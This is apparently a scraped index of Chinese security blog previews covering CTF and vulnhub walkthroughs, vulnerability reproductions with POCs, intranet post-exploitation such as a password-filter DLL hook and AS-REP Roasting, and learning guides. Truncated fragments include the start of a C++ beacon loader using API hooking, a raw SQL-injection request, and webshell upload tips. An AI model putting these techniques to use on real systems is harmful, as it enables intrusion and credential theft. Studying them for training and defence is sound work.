靶场下载地址 https://download.vulnhub.com/kioptrix/KVM3.rar 信息收集 # Nmap 7.94 scan initiated Thu Dec 21 21:52:25 2023 as: nmap -sn -oN live.nmap 192.168.1.0/24 Nmap scan report for 192.168.1.1 (192.168.1.1) Host is up (0.00048s latency). MAC Address:…

【网络安全必看】如何提升自身WEB渗透能力？

前言 web渗透这个东西学起来如果没有头绪和路线的话，是非常烧脑的。理清web渗透学习思路，把自己的学习方案和需要学习的点全部整理，你会发现突然渗透思路就有点眉目了。程序员之间流行一个词，叫35岁危机，&#xf…

CTFshow—web入门21-28（爆破）

文章目录WEB21WEB22WEB23WEB24WEB25WEB26WEB27WEB28WEB21 先随意使用一个密码抓包尝试一下 base64解密后发现账号密码的形式为账号：密码根据提示我们使用题目所给字典爆破构造payload，猜测账户名为admin，前半部分不用变，为后…

CTF-misc(1)图片隐写

笔记目录渗透测试工具(1)wireshark渗透测试工具(2)Nmap渗透测试工具(3)BurpsuiteAWD比赛(1)AWD入门攻略大纲CTF-Web(2)SQL注入CTF-Web(3)文件上传漏洞图片隐写目录 (1)GIf和二维码隐写二维码补全二维码绘图 Gif规律分析 (2)文本附加图片隐写 (3)IHDR文件头修复图片宽高 (…

内网渗透(七十三)之后渗透密码收集之 Hook PasswordChangeNotify

Hook PasswordChangeNotify 2013年九月，安全研究员Mubix发布了一个恶意的Windows密码过滤DLL。通过安装这个密码过滤DLL，可以在用户更改密码时拦截用户输入的明文密码并保存到本地，同时不会影响该用户更改密码的正常操作流程。但是，安装此密码过滤DLL需要重新启动计算机才…

网络安全（黑客技术）零基础学习手册

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

数据泄露、数据爬取......金融机构要如何保护催收场景下的数据安全？

金融企业的贷后催收是指向借款人发送催收通知和采取其他措施，以确保借款人按时还款并追回逾期贷款的过程。这通常包括电话催收、信函催收、上门访问等方式。贷后催收通常由金融机构内部的专业团队或第三方专业催收公司承担。由于催收业务会涉及到很多个人信息&…

JWT安全

文章目录理论知识cookie(放在浏览器)session(放在服务器)tokenjwt（json web token）headerpayloadSignatureJWT通信流程 JWT与Token 区别相同点区别 WebGoat靶场--JWT tokens环境启动第四关第五关第七关属于越权漏洞理论知识 cookie(放在浏览器) …

网络安全学习路线

01 什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面…

ECShop 4.x collection_listSQL注入

漏洞描述 ECShop是一款B2C独立网店系统，适合企业及个人快速构建个性化网上商店。系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序影响版本：ecshop4.0.7及以下漏洞环境及利用 docker环境搭建访问8080端口，数据库主机为mysql&a…

pikachu靶场-Unsafe Filedownload

不安全的文件下载文件下载功能在很多web系统上都会出现，一般我们当点击下载链接，便会向后台发送一个下载请求，一般这个请求会包含一个需要下载的文件名称，后台在收到请求后会开始执行下载代码，将该文件名对应的文件…

【漏洞复现】金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞附POC

漏洞描述金蝶云星空是一款云端企业资源管理（ERP）软件，为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空聚焦多组织，多利润中心的大中型企业，以 “开放、标准、社交”三大特性为数字经济时代的企业提供开放的 ERP 云平台。服务涵盖：财务、供…

【漏洞复现】FLIR AX8红外线热成像仪命令执行漏洞

漏洞描述 eledyne FLIR 设计、开发、制造以及强大的传感和意识技术。自透射热图像、可见光图像、可见频率分析、来自测量和诊断的先进威胁测量系统以及日常生活的创新解决方案。 Teledyne FLIR 提供多种产品用于政府、国防、工业和商业市场。我们的产品，紧急救援人员，军事人…

PHP代码审计之基础方法思路流程

工具 Fotify|代码审计静态扫描工具，商业化静态代码扫描工具，误报率相对较低。 seay|源代码审计工具 PHPStorm|是PHP编程语言开发的集成环境。 chrome & burp & HackerBar 插件 & xdebug插件 Xcheck |Xcheck是一个由腾讯公司CSIG质量部代…

初学网络安全一脸懵逼？看懂直接跪下！

一、网络安全分类主要类型网络安全由于不同的环境和应用而产生了不同的类型。主要有以下几种： 系统安全是指运行系统安全即保证信息处理和传输系统的安全。它侧重于保证系统正常运行。避免因为系统的崩溃和损坏而对系统存储、处理和传输的消息造成破坏和损失…

2022年全国职业院校技能大赛中职组网络安全竞赛试题B模块 —wirehark数据分析与取证captureWH.pcapng（解析教程）

2022年全国职业院校技能大赛中职组网络安全竞赛试题B模块 wirehark数据分析与取证captureWH.pcapng（解析教程）什么是wireshark？ wiresharek Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是检索取网络封包，并同时显示出最详细的网络封包数据。…

fastjson反序列化漏洞(CVE-2017-18349)

文章目录 fastjson序列化FastJson 序列化操作反序列化漏洞原理漏洞复现（CVE-2017-18349） fastjson fastjson 是阿里巴巴开发的 java语言编写的高性能 JSON 库,用于将数据在 Json 和 Java Object之间相互转换。它没有用java的序列化机制,而是自定义了一套…

网络协议与攻击模拟-02-wireshark使用-显示过滤器

显示过滤器语法 ■比较操作符：( eq ) !( neq ) ＞大于（ gt ) ＜小于（ It ) >大于等于（ ge ) <小于等于（ le ) ■逻辑操作符： and (&&）与 or (||) 或 not …

时空智友企业流程化管控系统 sessionid泄露漏洞复现

文章目录时空智友企业流程化管控系统 sessionid泄露漏洞复现0x01 前言0x02 漏洞描述0x03 影响平台0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现时空智友企业流程化管控系统 sessionid泄露漏洞复现 0x01 前言免责声明：请勿利用文章内的相关技术从…

安全扫描五项简介

目录安扫五项 1.代码检测 2.主机基线 nginx合规检查麒麟基线 3.WEB扫描 4.渗透测试用户枚举漏洞漏洞描述修复建议点击劫持漏洞漏洞描述修复建议 XSS漏洞漏洞描述修复建议 3.主机漏洞超高危漏洞高危漏洞中危漏洞低危漏洞信息漏洞参考信息…

【漏洞复现】CVE-2023-36076：smanga漫画阅读系统远程命令执行漏洞复现附POC 附SQL注入和任意文件读取

漏洞描述无需配置，docker直装的漫画流媒体阅读工具。以emby plex为灵感，为解决漫画阅读需求而开发的漫画阅读器。在windows环境部署smanga安装环境面板，首先安装小皮面板，下载smanga项目，导入数据库，登录smanga，windows部署smanga。 /php/manga/delete.php接口处存在未…

【网络安全】防火墙知识点全面图解（一）

防火墙知识点全面图解（一） 1、什么是防火墙？ 防火墙（Firewall）是防止火灾发生时，火势烧到其它区域，使用由防火材料砌的墙。后来这个词语引入到了网络中，把从外向内的网络入侵行为看…

一篇文章教会你如何编写一个简单的Shell脚本

文章目录简单Shell脚本编写1. 简单脚本编写2. Shell脚本参数2.1 Shell脚本参数判断2.1.1 文件测试语句2.1.2 逻辑测试语句2.1.3 整数值测试语句2.1.4 字符串比较语句 3. Shell流程控制语句3.1 if 条件测试语句3.1.1 if...3.1.2 if...else...3.1.3 if...elif...else 4. Shell脚…

正向代理、反向代理以及透明代理与隐私保护

最近无意间和同事聊到，连接公司 WiFi，到底会不会被监控？如果该热点已经是透明代理了，那么到底会不会泄露已经加密的隐私数据？ 1 代理对于大多数安全研究者来说，接触代理这一概念可能都是通过 Burpsuite …

tiny模式基本原理整合

【Tiny模式】的基本构成 M【首头在首位】 U【/】 V【HTTP/】 Host H【真实ip】 XH \r回车 \n换行 \t制表 \ 空格一个基本的模式构成 [method] [uri] [version]\r\nHost: [host]\r\n[method] [uri] [version]\r\nHost: [host]\r\n 检测顺序 http M H XH 有些地区 XH H M 我这边…

科普一下IP路由基础

目录一.IP路由产生背景二.路由信息介绍---路由表三.路由表（比较重要单独拿出来进行讲述） 四、路由条目如何生成/路由表内的信息怎样获取的五、最优路由条目选举办法六、IP路由总结一.IP路由产生背景 1.我们都知道IP地址可以标识网络中的一个节点&…

用友系列全漏洞检测工具

用友系列全漏洞检查工具plus版收录漏洞如下： 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞用友 U8 OA test.jsp SQL注入漏洞用友FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞用友 GRP-U8 UploadFileData 任意文件上传漏洞用友ERP-NC 目录遍…

如何选择合适的防护ddos服务？

互联网公司在选择防护服务的时候，需要考虑哪些因素呢？ 下面总结了几点： 第一、成本预算虽说一分钱一分货，贵的东西自然有贵的道理，但对于企业来说，控制成本还是非常有必要的，所以尽量选择性价比…

2020全国职业技能大赛嘉兴市“网络空间安全赛项”赛题及赛题解析（超详细）

2021年中职组“网络空间安全”赛项一.嘉兴市竞赛任务书二.任务书解析三.任务书答案四.不懂的可以私信博主！一.嘉兴市竞赛任务书一、竞赛时间 8：00—11：00 共计180分钟二、竞赛阶段竞赛阶段任务阶段竞赛任务竞赛时间分值第①阶段单兵模式系统渗透测试任务一： Ap…

Upload-labs（1-20关保姆级教程）

靶场下载链接 https://github.com/c0ny1/upload-labs 话不多说，直接喂饭 lab-1 上传php木马，发现弹出提示框，查看源码可知是前端过滤： bp抓包，先上传一张正常的jpg图片修改文件内容和后缀，大概就是想…

网络安全人人有责

文章目录前言内容简介读者对象目录介绍倡议网络安全是当今社会发展中非常重要的一个领域，它关系到每个人的利益和安全。在网络空间中，每一个人都有责任保护自己和他人的信息安全。我们应该认识到，网络安全不仅仅是政府部门或企业的责任&am…

Ragnar Locker勒索软件开发者在法国被逮捕

导语：在一次跨国行动中，执法机构逮捕了与Ragnar Locker勒索软件团伙有关的一名恶意软件开发者，并查封了该团伙的暗网网站。Ragnar Locker勒索软件团伙自2020年以来在全球范围内对168家国际公司进行了攻击。此次行动是法国、捷克、德国、意大利…

PHP MySQL 交互笔记/练习

PHP 与 MySQL 交互交互函数函数名作用mysqli_connect()与MySQL 数据库建立连接。mysqli_close()关闭与MYSQL 数据库建立的连接。mysqli_connect_errno()与MySQL 数据库建立连接时，发生错误时的错误编号。mysqli_connect_error()与MySQL 数据库建立连接时&#x…

分享一个VXLAN的Underlay配置模板

二层架构（Spine集中式双活Leaf M-LAG） Spine1配置配置说明Spine2配置system-view immediately进入系统视图并设置立即生效模式system-view immediately sysname Spine1Spine设备命名 sysname Spine2###配置METH口#配置METH口interface Meth0/0/0interfa…

Windows系统备份

Windows系统备份备份种类全量备份全量备份就是指对某一个时间点上的所有数据或应用进行一个完全拷贝。实际应用中就是用存储介质（如磁盘或其他方式）对整个系统进行全量备份，包括其中的系统和所有数据。这种备份方式最大的好处就是只要…

ConsoleApplication815项目（直接加载+VEH Hook Load）

上线图 ConsoleApplication815.cpp #include <iostream> #include<Windows.h> #include "detours.h" #include "detver.h" #pragma comment(lib,"detours.lib")#pragma warning(disable:4996)LPVOID Beacon_address; SIZE_T Beacon…

Vulnhub系列：VulnOSv2

老样子，kali ip:192.168.56.104，靶机ip利用nmap或arp-scan -l进行查看靶机ip为：192.168.56.124，利用nmap进行端口探测发现了22、80、6667端口，下一步就是进行web探测，输入靶机ip后发现页面存在个链接&#…

BS系统中的安全方案(SSO和Oauth2认证，数据加密)

摘要用户用浏览器打开网站，DNS会根据域名找到相应的服务器IP给到浏览器，仅接着用户的浏览器会与服务器建立连接，通过网路上的各个设备(交换机、路由器、基站、光纤等)，将服务器上的数据发送到用户的电脑上，在浏览器里呈…

Linux C/C++ 嗅探数据包并显示流量统计信息

嗅探数据包并显示流量统计信息是网络分析中的一种重要技术，常用于网络故障诊断、网络安全监控等方面。具体来说，嗅探器是一种可以捕获网络上传输的数据包，并将其展示给分析人员的软件工具。在嗅探器中，使用pcap库是一种常见的方法…

金蝶云星空RCE漏洞复现

0x01 产品简介金蝶云星空是一款云端企业资源管理（ERP）软件，为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空聚焦多组织，多利润中心的大中型企业，以 “开放、标准、社交”三大特性为数字…

提高网站性能的10种方法：加速用户体验和降低服务器负担

在今天的数字时代，网站性能对于吸引和保留用户至关重要。一个快速加载的网站不仅提供更好的用户体验，还有助于降低服务器负担。以下是10种提高网站性能的方法，旨在加速页面加载速度和减少服务器的工作负荷。压缩网页资源利用压缩算法如gzi…

如遭遇DDoS等攻击会对企业和个人造成严重影响，包括以下

1. 服务不可用：正常用户无法访问目标服务器，导致业务中断，影响用户体验。 2. 数据泄露：攻击者可能会在攻击过程中窃取用户数据，导致隐私泄露和财产损失。 3. 经济损失：由于服务中断，企业可能遭受…

BUUCTF [GXYCTF2019]luck_guy

使用DIE查看文件信息 ELF64位文件 IDA64打开这里读取输入，并且将输入传递给了patch_me函数跟进上面判断我们输入的数是否为奇数偶数时进入get_flag函数 ，这里不会传递任何参数首先循环5次然后匹配随机数如果为1，输出这是flag 首…

数通运营商方向常见面试问题（第四部分）

在一个运行PIM SM的网络中，组播流接受者收不到组播数据流，查看接收者侧DR（即网关）有(*，G)表项，但没有(S, G)， 请描述故障处理思路。检查RP地址是否正确dis pim rp-info检查沿途路由器PIM SM是否…

网络安全-应急响应

一、概述应急响应（Emergency Response）是指在发生紧急事件或安全事件时，及时采取措施以减轻损失和影响的过程。在计算机安全领域，应急响应通常指针对网络攻击、数据泄露、恶意软件感染等安全事件的应急处理过程。应急响应的主…

从零基础到网络安全专家：全网最全的网络安全学习路线

前言网络安全知识体系非常广泛，涉及的领域也非常复杂，有时候即使有想法和热情，也不知道从何入手。为了帮助那些想要进入网络安全行业的小伙伴们更快、更系统地学习网络安全知识，我制定了这份学习路线。本路线覆盖了网络安全的…

日志分析及风险评估_企业日志分析对提升网络安全有哪些帮助？

网络日志是很多企业IT管理员查找网络漏洞的重要依据，通过网络日志分析及风险评估，IT管理员可以扫清网络环境中的各类漏洞。但随着网络环境中各类设备的不断增加，人工日志采集变得愈发困难，因此网络日志采集在现在不得不依靠工具来…

【网络安全】文件上传绕过思路

引言分享一些文件上传绕过的思路，下文内容多包含实战图片，所以打码会非常严重，可多看文字表达；本文仅用于交流学习， 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人…

网络安全（黑客）——自学笔记

前言： 想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“…

网络协议与攻击模拟-11-DHCP协议原理

DHCP 协议 1、掌握 DHCP 的工作原理 2、会在 Windows server 上去部署 DHCP 服务 3、抓流量 ．正常收到攻击后一、 DHCP 1、 DHCP 基本概念 dhcp （动态主机配置协议）：主要就是给客户机提供 TCP / IP 参数（ IP 地…

vulnhub dc-5

1.信息搜集官方文档描述主要内容不会使用到ssh，进入的方式很难被发现，是改变页面刷新的方法，只有一个flag nmap扫描存活主机 192.168.85.176 端口 80 111 中间件： nginx 2.访问网站，进行进一步信息搜集通过这两张…

金某OA协同办公管理系统存在任意文件下载漏洞复现 CNVD-2021-43036

目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 5.Nuclei自动化验证 4.修复建议

六零导航页SQL注入漏洞复现（CVE-2023-45951）

0x01 产品简介 LyLme Spage（六零导航页）是中国六零（LyLme）开源的一个导航页面。致力于简洁高效无广告的上网导航和搜索入口，支持后台添加链接、自定义搜索引擎，沉淀最具价值链接，全站无商业推广…

[ vulhub漏洞复现篇 ] Drupal＜7.32 Drupalgeddon SQL注入漏洞（CVE-2014-3704）

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

俄罗斯黑客利用Roundcube零日漏洞窃取政府电子邮件

导语：最近，一起涉及Roundcube Webmail的零日漏洞被俄罗斯黑客组织Winter Vivern利用，攻击了欧洲政府机构和智库。这一漏洞已经存在至少一个月，直到10月16日，Roundcube开发团队才发布了安全补丁来修复这个Stored Cross-…

内网渗透-内网信息收集

内网信息收集前言当我们进行外网信息收集，漏洞探测以及漏洞利用后，获得了主机的权限后，我们需要扩大渗透的战果时，这是我们就要进行内网的渗透了，内网渗透最重要的还是前期的信息收集的操作了，就是我们的…

Kali-linux渗透攻击应用

前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。 6.4.1 渗透攻击MySQL数据库服务 MySQL是一个关系型数据库管理系统，由瑞典MySQL AB公司开发…

什么是Web应用程序防火墙，WAF与其他网络安全工具差异在哪？

一、什么是Web 应用程序防火墙 (WAF) ？ WAF软件产品被广泛应用于保护Web应用程序和网站免受威胁或攻击，它通过监控用户、应用程序和其他互联网来源之间的流量，有效防御跨站点伪造、跨站点脚本（XSS攻击）、SQL注入、DDo…

一个由“API未授权漏洞”引发的百万级敏感数据泄露

2023年4月的某一天，腾讯安全专家Leo正在为某家医院的重保防护做第一轮的安全风险排查。医院的专用APP是外部网络访问最高的，也就是最大的风险敞口，需要重点排查。 Leo下载APP进行测试后，发现该医院存在一个严重的问题&#xff…

[ vulnhub靶机通关篇 ] Empire Breakout 通关详解

🍬 博主介绍 👨‍🎓 博主介绍：大家好，我是 _PowerShell ，很高兴认识大家~ ✨主攻领域：【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏养成习…

Python split()函数使用详解，Python分割字符串

「作者主页」：士别三日wyx 「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：小白零基础《Python入门到精通》 split 1、不指定分隔符2、分隔符的类型3、指定分隔次数4、分隔的结果 split() 可…

StripedFly恶意软件框架感染了100万台Windows和Linux主机

导语近日，一款名为StripedFly的恶意软件框架在网络安全研究人员的监视之外悄然感染了超过100万台Windows和Linux系统。这款跨平台的恶意软件平台在过去的五年中一直未被察觉。在去年，卡巴斯基实验室发现了这个恶意框架的真实本质，并发现其活…

等级保护定级标准

定级是等级保护工作的首要环节和关键环节，是开展网络备案、建设整改、等级测评、监督检查等工作的重要基础。信息系统如果定级不准，后续工作都会偏离标准，网络安全就没有保证。因此，网络运营者、行业主管部门、网络安全监管部门和…

信息安全、网络安全和数据安全的相互关系

最近正在开展安全方面的相关工作，因此就对这些概念做了一些分析，参考各种介绍和书籍，结合自身的认识，总结起来如下，信息安全、网络安全、数据安全和基础设施安全的关系究竟是什么，信息安全概念最大&#xf…

【前沿技术分享】移动目标防御（MTD）被Gartner评为应用安全的新兴技术

Gartner发布了关于移动目标防御（动态防御，MTD）的新研究，希望引起您的注意。他们的发现表明，为什么MTD是预防为主的网络安全战略的重要组成部分。同样，他们的预测也预示着MTD在不久的将来会被供应商和安全团…

有趣的Hack-A-Sat黑掉卫星挑战赛——跟踪卫星

国家太空安全是国家安全在空间领域的表现。随着太空技术在政治、经济、军事、文化等各个领域的应用不断增加，太空已经成为国家赖以生存与发展的命脉之一，凝聚着巨大的国家利益，太空安全的重要性日益凸显[1]。而在信息化时代，太空安…

关于手机软硬件参数

关于手机设备名称型号版本号 Magic UI版本 Android版本10 IMEI(International Mobile Equipment Identity,国际移动设备身份码)，国际移动装备辨识码，是由15位数字组成的"电子串号"，即通常所说的手机序列号、手机“串号”…

【高危】Apache Linkis JDBC EngineConn 插件＜1.3.2 存在反序列化漏洞

漏洞描述 Apache Linkis 是一个用于将上层应用与底层数据引擎解耦，提供标准化接口的中间件。该项目受影响版本存在反序列化漏洞，由于ConnectionManager.java中未对dbUrl、username、password等参数进行充分过滤，当恶意用户完全控制应用程序…

什么是DDoS攻击

DDoS攻击 1. 定义2. DDoS攻击类型2.1 网络层攻击2.2 传输层攻击2.3 应用层攻击 3.DDoS攻击态势特点 1. 定义分布式拒绝服务（DDoS）攻击是一种常见的网络攻击形式。攻击者利用恶意程序对一个或多个目标发起攻击，企图通过大规模互联网流量耗尽…

不安全的文件下载与上传

目录 unsafe filedownload （不安全的文件下载） 官方简介开始闯关分析源码 unsafe fileupload (不安全的文件上传) 官方概述测试流程 pikachu--unsafe fileupload--client check 源码分析 pikachu--Unsafe Fileupload --MIME type 传入不符合…

buuctf_练[CSAWQual 2019]Web_Unagi

[CSAWQual 2019]Web_Unagi 文章目录 [CSAWQual 2019]Web_Unagi掌握知识解题思路关键payload 掌握知识 XXE漏洞利用，xml文件转换编码绕过WAF(UTF-8 --> UTF-16)，xml文件格式的书写再遇到上传xml文件被拦截，就尝试修改编码再上传&a…

BUUCTF [SWPU2019]我有一只马里奥 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 得到的 flag 请包上 flag{} 提交。密文： 下载附件，得到一个.exe文件。解题思路： 1、双击.exe文件运行，得到一个1.txt文本。打开，如下图。 2、提示我们…

detour编译问题及导入visual studio

Detours是经过微软认证的一个开源Hook库，Detours在GitHub上，网址为 https://github.com/Microsoft/Detours 注意版本不一样的话也是会出问题的，因为我之前是vs2022的所以之前的detours.lib不能使用，必须用对应版本的x64 Native To…

IPsec中IKE与ISAKMP过程分析（主模式-消息4）

IPsec中IKE与ISAKMP过程分析（主模式-消息1）_搞搞搞高傲的博客-CSDN博客 IPsec中IKE与ISAKMP过程分析（主模式-消息2）_搞搞搞高傲的博客-CSDN博客 IPsec中IKE与ISAKMP过程分析（主模式-消息3）_搞搞搞高傲的博客…

【Elasticsearch 未授权访问漏洞复现】

文章目录一、漏洞描述二、漏洞复现三、修复建议一、漏洞描述 ElasticSearch是一个基于Lucene的搜索服务器。它提供了一个分布式多用户能力的全文搜索引擎，基于RESTful web接口。Elasticsearch是用Java开发的，并作为Apache许可条款下的开放源码发布&am…

【漏洞复现】DophinPHP后台getshell

漏洞描述 DolphinPHP（海豚PHP）是一个基于ThinkPHP5.1.41LTS开发的一套开源PHP快速开发框架，DolphinPHP秉承极简、极速、极致的开发理念，为开发集成了基于数据-角色的权限管理机制，集成多种灵活快速构建工具，可方便快速扩展的模块、插件、钩子、数据包。统一了模块、插件…

永恒之蓝漏洞 ms17_010 详解

文章目录永恒之蓝 ms 17_0101.漏洞介绍1.1 影响版本1.2 漏洞原理 2.信息收集2.1 主机扫描2.2 端口扫描 3. 漏洞探测4. 漏洞利用5.后渗透阶段5.1创建新的管理员账户5.2开启远程桌面5.3蓝屏攻击永恒之蓝 ms 17_010 1.漏洞介绍永恒之蓝（ms17-010）爆发于…

DVWA-XSS (Stored) Low/Medium/High低中高级别

「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》 XSS Stroed 一、Low级别二、Medium级别三、Hign级别这关是一个论坛功能，把用…

常用网安渗透工具及命令（扫目录、解密爆破、漏洞信息搜索）

目录 dirsearch： dirmap： 输入目标文件读取 ciphey（很强的一个自动解密工具）： john(破解密码)： whatweb指纹识别： searchsploit： 例1： 例2： 例3&…

网络安全（黑客）—小白自学路线

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

如何判断sql注入流量特征

如何判断sql注入流量特征以dvwa的sql注入为例首先构造一个完整的sql注入请求包 GET /dvwa_2.0.1/vulnerabilities/sqli/?id1&SubmitSubmit HTTP/1.1 Host: 10.9.47.41 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.…

【漏洞库】XXL-JOB executor 未授权访问漏洞导致RCE

文章目录漏洞描述漏洞编号漏洞评级影响版本漏洞复现- EXP 编写漏洞挖掘修复建议漏洞描述 XXL-JOB是一个分布式任务调度平台，其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线，开箱即用。XXL-JOB分为adm…

内网渗透(六十)之AS-REP Roasting攻击

AS-REP Roasting攻击 AS-REP Roasting是一种针对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限，因为其需要用户账户设置“不要求Kerberos预身份验证”选项。而该选项默认是没有勾选的。Kerberos域身份验证发生在Kerberos身份验证的第一阶段（AS_REQ&AS_…

uploads靶场通关(1-11关)

Pass-01（JS校验） 看题目我们准备好我们的php脚本文件，命名为1.php 上传该php文件，发现上传失败方法一：将浏览器的JavaScript禁用然后就能上传了方法二： 查看源码，发现只能上传以下形式的文…

1.2 Kali Linux的网络配置

前言最新文章请见此处，持续更新，敬请订阅！https://blog.csdn.net/algorithmyyds/category_12418682.html 网络在如今的社会已是十分重要的媒介，如果没有网络，很多事情将难以办成。渗透测试也是一样——毕竟在攻击机…

靶机 DC-2

DC_2 信息搜集存活检测详细扫描添加 host 后台网页扫描网页信息搜集主页面找到 flag1，提示使用 cewl 密码生成工具 wp 登陆界面使用 wpscan 扫描用户 wpscan --url http://dc-2/ --enumerate u 扫描出用户 tom、jerry、admin 将三个用户名写入文件中…

Apache Tomcat RemoteIpFilter cookie 处理不当（CVE-2023-28708）

漏洞描述 Apache Tomcat 是一款开源的 Web 应用服务器，RemoteIpFilter 是一个过滤器，用于将 HTTP 请求中代理服务器的 IP 地址替换为客户端的真实 IP 地址。受影响版本中，当使用 RemoteIpFilter 处理通过 HTTP 从反向代理接收到的请求时&a…

渗透测试工具有哪些？为什么不建议只用工具？

由于互联网的发展和网络经济的兴起，越来越多的企业把服务或交易平台放到了互联网上，但是这些暴露在网络上的资源往往防御能力较弱，这也给了网络黑客总有可乘之机，因此，渗透测试被越来越多的企业和组织所需要&#xff0…

BUUCTF 大白 1

BUUCTF:https://buuoj.cn/challenges 题目描述： 看不到图？ 是不是屏幕太小了。密文： 下载附件后解压，发现一张名为dabai.png的图片。 （似乎因为文件被修改过，原图片无法放在这里，这张图片是…

内网渗透之域环境信息搜集

1.查看是否为域环境 net config workstation下面命令能否执行成功和computer brower服务是否开启有关 net view /domain2.查询域内的用户和组查询域内的所有用户 net user /domain查询域内的所有用户(需要在域控上敲) dsquery user查询域内的某个用户 net user dbadmin /d…

ubuntu20.04下安装nc

前言 nc在网络渗透测试中非常好用，这里的主要记一下Ubuntu20.04中nc的安装编译安装第一种方式是自己编译安装，先下载安装包 nc.zip wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.…

网络安全（骇客）—技术学习

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟入…

本地电脑怎么连接服务器？103.216.154.x

当我们有了一台属于自己的服务器的时候，想远程桌面连接到服务器，怎么连接呢，下面来分享一下方法！ 准备工作:服务器(服务器ip，端口，账号密码) 个人电脑第一步在我们的电脑上面按winR键打开运行&#xff0…

Breach 1.0 靶机

Breach 1.0 环境配置设置 VMware 上的仅主机模式网卡，勾选 DHCP 自动分配 IP，将子网改为 192.168.110.0/24 将靶机和 kali 连接到仅主机网卡信息搜集存活检测详细扫描后台网页扫描网页信息搜集 Initech被入侵，董事会投票决定引入…

网络安全渗透测试的八个步骤（二）

一、信息分析 1.精确化：备好上一步检测过的系统漏洞的exp，用于精确化; 2.绕开自我防御机制：是否存在网络防火墙等设施，怎样绕开; 3.订制进攻途径：最好专用工具途径，依据欠缺通道，高内部网管理…

天空卫士在全球和中国两大报告中被Gartner列为推荐和代表性供应商

DLP连续五年被Gartner 列为推荐厂商的理由 Gartner2023年9月份发布的《Gartner全球企业数据防泄露市场指南》中，天空卫士被列为DLP领域代表供应商，包括EDLP、IDLP和云原生DLP。这已经是天空卫士第五次入选《Gartner全球企业数据防泄露市场指南》。天空…

黑客技术（自学方法）——网络安全

前言前几天发布了一篇网络安全（黑客）自学没想到收到了许多人的私信想要学习网安黑客技术！却不知道从哪里开始学起！怎么学？如何学？ 今天给大家分享一下，很多人上来就说想学习黑客&#xff0c…

HZNUCTF2023部分wp-Reverse

checkIn 直接打开，看到flag，但是是小端存储要倒过来也可以直接在hex中查看，中间不需要的部分删除得到flag：HZNUCTF{We1c0me_t0_Reverse} Bytecode 下载附件可以看到如下，这个好像是python的字节码（pyt…

【置顶】：文章合集系列

【置顶】：文章合集系列必看文章中的所有内容仅供做个人学习使用，所有环境都在本地搭建并验证，任何人使用文中方法进行未经授权的渗透行为都与文章与我本人无关，请各位大佬不要进行未经授权的渗透行为…… 前言之前更新过一段…

【网络奇遇记】那年我与计算机网络的浅相知

🌈个人主页：聆风吟 🔥系列专栏：网络奇遇记、数据结构 🔖少年有梦不应止于心动，更要付诸行动。文章目录一. 计算机网络的定义1.1 计算机早期的一个最简单的定义1.2 现阶段计算机网络的一个较好的定义二. …

【网络安全】网络防护之旅 - 非对称密钥体制的解密挑战

🌈个人主页：Sarapines Programmer🔥 系列专栏：《网络安全之道 | 数字征程》⏰墨香寄清辞：千里传信如电光，密码奥妙似仙方。挑战黑暗剑拔弩张，网络战场誓守长。目录 😈1. 初识网络安…

Less-09（时间盲注）

无论输入什么，都不会有任何改变，应该要用时间盲注介绍三个函数 sleep()参数写数字，此函数用于将时间延迟，参数的单位是秒 if(expr1,expr2,expr3)若expr1为真则执行expr2，否则执行expr3 可以先用代码测试一下 ?id1 …

buuctf-Kookie

登录要输入admin，要在cookie中输入，这题理解不难，但是容易被自己绕进去 url上给出了参数输入的格式，按照格式写进cookie里点Log out! 会回到初始页面，查看源代码也没有flag（这确实时登录进去了&#xff0c…

万户协同办公平台 ezoffice存在未授权访问漏洞附POC

